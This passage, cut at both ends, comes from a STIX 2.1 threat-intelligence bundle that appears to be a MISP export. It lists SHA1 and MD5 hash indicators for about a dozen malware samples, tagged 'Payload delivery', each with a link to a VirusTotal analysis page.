"id": "url--58db81fa-d03c-47db-b6fa-469802de0b81",
|
|
"value": "https://www.virustotal.com/file/85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07/analysis/1434004301/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81fc-9a58-4174-85c3-480002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:28.000Z",
|
|
"modified": "2017-03-29T09:44:28.000Z",
|
|
"description": "sample - Xchecked via VT: 6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76",
|
|
"pattern": "[file:hashes.SHA1 = 'dccd50e00da3a280a59b094bee7049c2512577f3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81fd-2134-41bb-8167-4bde02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:29.000Z",
|
|
"modified": "2017-03-29T09:44:29.000Z",
|
|
"description": "sample - Xchecked via VT: 6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76",
|
|
"pattern": "[file:hashes.MD5 = '32496c7b4a805044cc679682e07bd5bf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81fe-0b70-4514-9261-48ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:30.000Z",
|
|
"modified": "2017-03-29T09:44:30.000Z",
|
|
"first_observed": "2017-03-29T09:44:30Z",
|
|
"last_observed": "2017-03-29T09:44:30Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81fe-0b70-4514-9261-48ab02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81fe-0b70-4514-9261-48ab02de0b81",
|
|
"value": "https://www.virustotal.com/file/6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76/analysis/1431331733/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ff-9b4c-46b0-bafa-466402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:31.000Z",
|
|
"modified": "2017-03-29T09:44:31.000Z",
|
|
"description": "sample - Xchecked via VT: e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7",
|
|
"pattern": "[file:hashes.SHA1 = '660a10d8ce5f67d33c3c59bb0a588d155bddcda5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8200-419c-4daa-ade8-4fd702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:32.000Z",
|
|
"modified": "2017-03-29T09:44:32.000Z",
|
|
"description": "sample - Xchecked via VT: e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7",
|
|
"pattern": "[file:hashes.MD5 = '7327e7c0b49d99ace14897bccd8476c7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8200-ee98-47c3-9c4b-4f3302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:32.000Z",
|
|
"modified": "2017-03-29T09:44:32.000Z",
|
|
"first_observed": "2017-03-29T09:44:32Z",
|
|
"last_observed": "2017-03-29T09:44:32Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8200-ee98-47c3-9c4b-4f3302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8200-ee98-47c3-9c4b-4f3302de0b81",
|
|
"value": "https://www.virustotal.com/file/e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7/analysis/1442592530/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8201-215c-4a34-b03d-405b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:33.000Z",
|
|
"modified": "2017-03-29T09:44:33.000Z",
|
|
"description": "sample - Xchecked via VT: f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4",
|
|
"pattern": "[file:hashes.SHA1 = '76448e5e448f770fcce4ac94aef9de93696d5ebb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8202-73b4-4aaf-abd5-45df02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:34.000Z",
|
|
"modified": "2017-03-29T09:44:34.000Z",
|
|
"description": "sample - Xchecked via VT: f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4",
|
|
"pattern": "[file:hashes.MD5 = 'cb0b4df7f5c1dc57a5d19002c5583efc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8203-1e68-4ff0-9b11-4a4e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:35.000Z",
|
|
"modified": "2017-03-29T09:44:35.000Z",
|
|
"first_observed": "2017-03-29T09:44:35Z",
|
|
"last_observed": "2017-03-29T09:44:35Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8203-1e68-4ff0-9b11-4a4e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8203-1e68-4ff0-9b11-4a4e02de0b81",
|
|
"value": "https://www.virustotal.com/file/f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4/analysis/1475954784/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8204-7100-4f07-8710-48c902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:36.000Z",
|
|
"modified": "2017-03-29T09:44:36.000Z",
|
|
"description": "sample - Xchecked via VT: 95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada",
|
|
"pattern": "[file:hashes.SHA1 = '3b17b9a9943e53cad564166229a6d44388e288a6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8205-41b8-462e-bbd1-440e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:37.000Z",
|
|
"modified": "2017-03-29T09:44:37.000Z",
|
|
"description": "sample - Xchecked via VT: 95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada",
|
|
"pattern": "[file:hashes.MD5 = '14a1e8ed96207c58045434c5e8bba393']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8206-26dc-4899-94bb-436602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:38.000Z",
|
|
"modified": "2017-03-29T09:44:38.000Z",
|
|
"first_observed": "2017-03-29T09:44:38Z",
|
|
"last_observed": "2017-03-29T09:44:38Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8206-26dc-4899-94bb-436602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8206-26dc-4899-94bb-436602de0b81",
|
|
"value": "https://www.virustotal.com/file/95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada/analysis/1475943890/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8207-6dbc-4a65-aaa2-41d502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:39.000Z",
|
|
"modified": "2017-03-29T09:44:39.000Z",
|
|
"description": "sample - Xchecked via VT: 03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373",
|
|
"pattern": "[file:hashes.SHA1 = '64581fd4b3b3f19187f0bdc788659c3461b253eb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8208-85f0-45a9-89b9-493302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:40.000Z",
|
|
"modified": "2017-03-29T09:44:40.000Z",
|
|
"description": "sample - Xchecked via VT: 03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373",
|
|
"pattern": "[file:hashes.MD5 = 'e12327e36f3819ab85f7023501157cac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8209-3e20-4439-bf8e-4ff002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:41.000Z",
|
|
"modified": "2017-03-29T09:44:41.000Z",
|
|
"first_observed": "2017-03-29T09:44:41Z",
|
|
"last_observed": "2017-03-29T09:44:41Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8209-3e20-4439-bf8e-4ff002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8209-3e20-4439-bf8e-4ff002de0b81",
|
|
"value": "https://www.virustotal.com/file/03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373/analysis/1475950975/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db820a-6ad8-497d-95b6-425b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:42.000Z",
|
|
"modified": "2017-03-29T09:44:42.000Z",
|
|
"description": "sample - Xchecked via VT: 9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271",
|
|
"pattern": "[file:hashes.SHA1 = '40d2dd20bd676a8b389561fe91caa2e4c23c61aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db820b-e9b4-4c1f-b3c1-4a4702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:42.000Z",
|
|
"modified": "2017-03-29T09:44:42.000Z",
|
|
"description": "sample - Xchecked via VT: 9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271",
|
|
"pattern": "[file:hashes.MD5 = '3d941962d99aef319102f00db69f7308']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db820b-b3d8-49ea-b0f3-4e0202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:43.000Z",
|
|
"modified": "2017-03-29T09:44:43.000Z",
|
|
"first_observed": "2017-03-29T09:44:43Z",
|
|
"last_observed": "2017-03-29T09:44:43Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db820b-b3d8-49ea-b0f3-4e0202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db820b-b3d8-49ea-b0f3-4e0202de0b81",
|
|
"value": "https://www.virustotal.com/file/9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271/analysis/1475944812/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db820c-04a0-4227-ac77-433a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:44.000Z",
|
|
"modified": "2017-03-29T09:44:44.000Z",
|
|
"description": "sample - Xchecked via VT: 2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c",
|
|
"pattern": "[file:hashes.SHA1 = '287ab78af5090f3ff1acdbb5395b527235fe0669']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db820d-8464-4941-b232-484902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:45.000Z",
|
|
"modified": "2017-03-29T09:44:45.000Z",
|
|
"description": "sample - Xchecked via VT: 2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c",
|
|
"pattern": "[file:hashes.MD5 = 'cebaabe0065ab3bce5a917fbefbd1743']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db820e-8ccc-4884-a821-455d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:46.000Z",
|
|
"modified": "2017-03-29T09:44:46.000Z",
|
|
"first_observed": "2017-03-29T09:44:46Z",
|
|
"last_observed": "2017-03-29T09:44:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db820e-8ccc-4884-a821-455d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db820e-8ccc-4884-a821-455d02de0b81",
|
|
"value": "https://www.virustotal.com/file/2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c/analysis/1455263114/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db820f-c4d0-4eec-9915-424e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:47.000Z",
|
|
"modified": "2017-03-29T09:44:47.000Z",
|
|
"description": "sample - Xchecked via VT: 82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585",
|
|
"pattern": "[file:hashes.SHA1 = 'c4d96f06d1c727113bae748344d4d53185ebb76e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8210-c830-4bb9-845b-417b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:48.000Z",
|
|
"modified": "2017-03-29T09:44:48.000Z",
|
|
"description": "sample - Xchecked via VT: 82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585",
|
|
"pattern": "[file:hashes.MD5 = '9b03b58f7422649b88b06176c0f00060']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8211-3e74-4051-9ca2-41eb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:49.000Z",
|
|
"modified": "2017-03-29T09:44:49.000Z",
|
|
"first_observed": "2017-03-29T09:44:49Z",
|
|
"last_observed": "2017-03-29T09:44:49Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8211-3e74-4051-9ca2-41eb02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8211-3e74-4051-9ca2-41eb02de0b81",
|
|
"value": "https://www.virustotal.com/file/82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585/analysis/1451316687/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8212-d690-4846-8b46-4c3c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:50.000Z",
|
|
"modified": "2017-03-29T09:44:50.000Z",
|
|
"description": "sample - Xchecked via VT: 3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8",
|
|
"pattern": "[file:hashes.SHA1 = '89689372c0ea5f41b9e89cd65002d19945c956fa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8213-acb4-4a6e-8b03-486202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:51.000Z",
|
|
"modified": "2017-03-29T09:44:51.000Z",
|
|
"description": "sample - Xchecked via VT: 3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8",
|
|
"pattern": "[file:hashes.MD5 = 'f494398a6a76c505677a7cc3084aeef1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8214-4f78-4d53-91b8-4e0102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:52.000Z",
|
|
"modified": "2017-03-29T09:44:52.000Z",
|
|
"first_observed": "2017-03-29T09:44:52Z",
|
|
"last_observed": "2017-03-29T09:44:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8214-4f78-4d53-91b8-4e0102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8214-4f78-4d53-91b8-4e0102de0b81",
|
|
"value": "https://www.virustotal.com/file/3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8/analysis/1445525314/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8215-c3ec-4f92-b93a-42ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:53.000Z",
|
|
"modified": "2017-03-29T09:44:53.000Z",
|
|
"description": "sample - Xchecked via VT: beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed",
|
|
"pattern": "[file:hashes.SHA1 = 'e7f90dc3f00c545638ed52c87630192a674c10b9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8215-a304-4768-aee2-494402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:53.000Z",
|
|
"modified": "2017-03-29T09:44:53.000Z",
|
|
"description": "sample - Xchecked via VT: beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed",
|
|
"pattern": "[file:hashes.MD5 = '56a57a8e53a02270c8511144e9424b70']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8216-4d38-4e77-887a-443302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:54.000Z",
|
|
"modified": "2017-03-29T09:44:54.000Z",
|
|
"first_observed": "2017-03-29T09:44:54Z",
|
|
"last_observed": "2017-03-29T09:44:54Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8216-4d38-4e77-887a-443302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8216-4d38-4e77-887a-443302de0b81",
|
|
